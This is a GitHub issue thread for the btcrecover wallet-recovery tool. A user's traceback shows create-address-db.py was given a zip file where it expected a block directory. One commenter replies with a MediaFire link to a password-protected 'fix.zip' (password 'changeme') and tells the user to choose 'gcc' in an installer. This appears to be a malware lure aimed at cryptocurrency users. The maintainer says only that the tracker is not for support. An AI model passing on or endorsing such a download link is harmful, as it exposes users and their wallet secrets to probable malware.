### ISSUE TITLE
help me

### ISSUE THREAD

**Issue by omega13245** [3rdIteration/btcrecover#500]
when I load the command   python create-address-db.py --datadir d:\addresses-btc-2019-Jan2024.zip --dblength 30
I get an error  C:\Users\User\btcrecover-master>python create-address-db.py --datadir d:\addresses-btc-2019-Jan2024.zip --dblength 30
Starting CreateAddressDB 1.11.0-CryptoGuide
Traceback (most recent call last):
  File "C:\Users\User\btcrecover-master\create-address-db.py", line 86, in <module>
    addressset.create_address_db(args.dbfilename, blockdir, args.dblength, args.blocks_startdate, args.blocks_enddate, args.first_block_file, args.dbyolo, args.addrs_to_text, args.update, progress_bar=not args.no_progress, addresslistfile = args.inputlistfile, multiFile = args.multifileinputlist, forcegzip = args.forcegzip)
  File "C:\Users\User\btcrecover-master\btcrecover\addressset.py", line 376, in create_address_db
    raise ValueError("no block files exist in blocks directory '{}'".format(blockdir))
ValueError: no block files exist in blocks directory 'd:\addresses-btc-2019-Jan2024.zip\blocks'

what to do, please help!

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 3rdIteration** [comment]
This isn't a support channel.

Free support happens in the YouTube comments section, paid private support can be requested here https://cryptoguide.tips/recovery-services-consultations/
